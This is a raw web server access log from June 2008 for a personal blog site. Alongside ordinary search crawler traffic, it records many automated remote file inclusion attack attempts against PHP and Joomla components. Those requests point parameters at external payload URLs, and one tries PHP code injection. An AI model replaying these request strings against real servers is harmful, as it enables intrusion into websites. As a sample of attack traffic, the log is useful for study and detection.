67.195.37.125 - - [25/Jun/2008:10:59:41 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/category/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [25/Jun/2008:10:59:42 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/category/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
83.98.156.151 - - [25/Jun/2008:11:00:27 -0700] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:11:00:27 -0700] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:11:00:28 -0700] "GET //skin/zero_vote/error.php?dir=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:11:00:28 -0700] "GET //skin/zero_vote/error.php?dir=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:11:00:28 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:11:00:28 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [25/Jun/2008:11:00:28 -0700] "GET /logs/scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [25/Jun/2008:11:00:29 -0700] "GET /scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:11:00:30 -0700] "GET /logs//components/com_mambowiki/MamboLogin.php?IP=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:11:00:31 -0700] "GET //components/com_mambowiki/MamboLogin.php?IP=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:11:00:51 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
118.45.190.171 - - [25/Jun/2008:11:01:07 -0700] "GET /logs/access_080215.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file= HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
118.45.190.171 - - [25/Jun/2008:11:01:09 -0700] "GET /logs/access_080215.log/data/compatible.php?module_name=Mobile%20Entartainment%22 HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
59.125.5.1 - - [25/Jun/2008:11:01:27 -0700] "GET /logs/access_080321.log/index1.php?l=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [25/Jun/2008:11:01:31 -0700] "GET /index1.php?l=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [25/Jun/2008:11:01:35 -0700] "GET /logs/index1.php?l=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.17.35.228 - - [25/Jun/2008:11:01:57 -0700] "GET /logs/access_080220.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://210.118.194.173/cj/rfi/22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.35.228 - - [25/Jun/2008:11:01:57 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://210.118.194.173/cj/rfi/22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.35.228 - - [25/Jun/2008:11:01:57 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://210.118.194.173/cj/rfi/22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.35.228 - - [25/Jun/2008:11:02:02 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://210.118.194.173/cj/rfi/22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:11:02:38 -0700] "GET /logs/access.log//ktedit/toolbar.php?dirDepth=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:11:02:38 -0700] "GET //ktedit/toolbar.php?dirDepth=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:11:02:39 -0700] "GET /logs//ktedit/toolbar.php?dirDepth=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.19.213 - - [25/Jun/2008:11:02:58 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [25/Jun/2008:11:02:58 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:11:03:04 -0700] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:11:03:07 -0700] "GET /logs/access_080322.log//modules/vwar/admin/admin.php?vwar_root=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:11:03:08 -0700] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:11:03:08 -0700] "GET /logs/access_080322.log//modules/vwar/admin/admin.php?vwar_root=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [25/Jun/2008:11:03:14 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [25/Jun/2008:11:03:14 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:11:03:23 -0700] "GET /logs/access_080312.log/?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.22.157 - - [25/Jun/2008:11:03:24 -0700] "GET /logs/access_080103.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:11:03:26 -0700] "GET /?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 200 18403 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:11:03:26 -0700] "GET /logs/?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 200 53419 "-" "libwww-perl/5.810" "www.dmulk.com"
216.117.152.168 - - [25/Jun/2008:11:03:33 -0700] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:04:08 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:04:08 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:04:11 -0700] "GET /index.php?redir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 200 18425 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:04:13 -0700] "GET /logs/index.php?redir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:04:14 -0700] "GET /index.php?redir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 200 18441 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:04:15 -0700] "GET /logs/index.php?redir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.12.218.244 - - [25/Jun/2008:11:04:34 -0700] "GET /presto/ HTTP/1.1" 200 526 "http://www.xbox.com/ja-JP/games/w/whacked/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
61.12.218.244 - - [25/Jun/2008:11:04:35 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
61.12.218.244 - - [25/Jun/2008:11:04:39 -0700] "GET /presto/?N=D HTTP/1.1" 200 526 "http://www.dmulk.com/presto/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
202.221.143.111 - - [25/Jun/2008:11:04:51 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [25/Jun/2008:11:04:51 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:11:05:13 -0700] "GET /logs/access_080228.log//modules/vwar/admin/admin.php?vwar_root=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.156.151 - - [25/Jun/2008:11:05:13 -0700] "GET /logs/access_080228.log//modules/vwar/admin/admin.php?vwar_root=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
8.2.208.2 - - [25/Jun/2008:11:05:28 -0700] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:11:06:10 -0700] "GET /logs/access_071216.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:11:06:10 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:11:06:11 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:11:06:18 -0700] "GET /logs/access_080201.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:06:21 -0700] "GET /logs/access_080121.log/index.php?redir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:06:22 -0700] "GET /logs/access_080121.log/index.php?redir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.87.100 - - [25/Jun/2008:11:06:25 -0700] "GET /language/lang_english/lang_activity.php?phpbb_root_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:11:06:40 -0700] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:11:07:26 -0700] "GET /logs/access_080220.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:11:07:26 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:11:07:26 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:11:07:28 -0700] "GET /logs/access_080312.log/administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:11:07:28 -0700] "GET /administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:11:07:29 -0700] "GET /logs/administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:11:07:38 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:11:07:39 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:11:07:39 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.117.152.168 - - [25/Jun/2008:11:07:42 -0700] "GET //config/dbutil.bck.php?confdir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:11:07:44 -0700] "GET /logs/access_080110.log//modules/TotalCalendar/about.php?inc_dir=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:08:00 -0700] "GET /index.php?redir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 200 18441 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:08:00 -0700] "GET /logs/access_080127.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:08:01 -0700] "GET /index.php?redir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 200 18441 "-" "libwww-perl/5.805" "www.dmulk.com"
8.2.208.2 - - [25/Jun/2008:11:08:03 -0700] "GET //config/dbutil.bck.php?confdir=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:11:08:12 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.54.21.66 - - [25/Jun/2008:11:08:23 -0700] "GET /logs/access_080122.log/index.php?option=com_creation3d&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.21.66 - - [25/Jun/2008:11:08:24 -0700] "GET /logs/index.php?option=com_creation3d&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.21.66 - - [25/Jun/2008:11:08:25 -0700] "GET /index.php?option=com_creation3d&mosConfig_absolute_path=http://warsector.ru//access2008.log? HTTP/1.1" 200 18481 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:11:08:37 -0700] "GET /logs/access_080425.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:11:08:37 -0700] "GET //config/dbutil.bck.php?confdir=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
65.55.231.102 - - [25/Jun/2008:11:08:37 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.231.102 - - [25/Jun/2008:11:08:38 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0165.jpg HTTP/1.1" 200 11479 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
74.55.76.110 - - [25/Jun/2008:11:08:38 -0700] "GET /logs/access_080425.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.231.102 - - [25/Jun/2008:11:08:39 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0145.jpg HTTP/1.1" 200 8484 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.231.102 - - [25/Jun/2008:11:08:41 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0137_0.jpg HTTP/1.1" 200 385301 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.231.102 - - [25/Jun/2008:11:08:42 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0118.jpg HTTP/1.1" 200 9985 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.231.102 - - [25/Jun/2008:11:08:43 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0170.jpg HTTP/1.1" 200 360510 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.231.102 - - [25/Jun/2008:11:08:46 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0115.jpg HTTP/1.1" 200 10243 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.231.102 - - [25/Jun/2008:11:08:48 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0150.jpg HTTP/1.1" 200 378254 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.231.102 - - [25/Jun/2008:11:08:49 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0122.jpg HTTP/1.1" 200 12140 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.231.102 - - [25/Jun/2008:11:08:50 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0147.jpg HTTP/1.1" 200 421697 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.231.102 - - [25/Jun/2008:11:08:51 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0152.jpg HTTP/1.1" 200 10269 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.231.102 - - [25/Jun/2008:11:08:53 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0111.jpg HTTP/1.1" 200 377705 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.231.102 - - [25/Jun/2008:11:08:55 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0106.jpg HTTP/1.1" 200 331757 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.231.102 - - [25/Jun/2008:11:08:57 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0135.jpg HTTP/1.1" 200 11081 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.231.102 - - [25/Jun/2008:11:08:59 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0167.jpg HTTP/1.1" 200 399577 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
74.55.76.110 - - [25/Jun/2008:11:08:59 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:11:09:01 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 200 18549 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.231.102 - - [25/Jun/2008:11:09:01 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0126.jpg HTTP/1.1" 200 401657 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
74.55.76.110 - - [25/Jun/2008:11:09:01 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.231.102 - - [25/Jun/2008:11:09:02 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0168.jpg HTTP/1.1" 200 11703 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
91.194.90.180 - - [25/Jun/2008:11:09:12 -0700] "GET ///ashnews.php?pathtoashnews=http://samurai.tuxfamily.org/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
91.194.90.180 - - [25/Jun/2008:11:09:12 -0700] "GET /logs///ashnews.php?pathtoashnews=http://samurai.tuxfamily.org/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:09:21 -0700] "GET /logs/access_080127.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.76.110 - - [25/Jun/2008:11:10:06 -0700] "GET /logs/access_080425.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.guardianbeast.helloweb.eu/idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:11:10:17 -0700] "GET /logs/access_080215.log/administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.195.42.191 - - [25/Jun/2008:11:10:38 -0700] "GET /logs/access_080215.log/?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:11:10:44 -0700] "GET //config/dbutil.bck.php?confdir=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:11:11:42 -0700] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:11:11:46 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:11:12:00 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.800" "www.dmulk.com"
65.98.70.18 - - [25/Jun/2008:11:12:23 -0700] "GET /logs/access.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:11:12:27 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
59.106.19.213 - - [25/Jun/2008:11:12:27 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
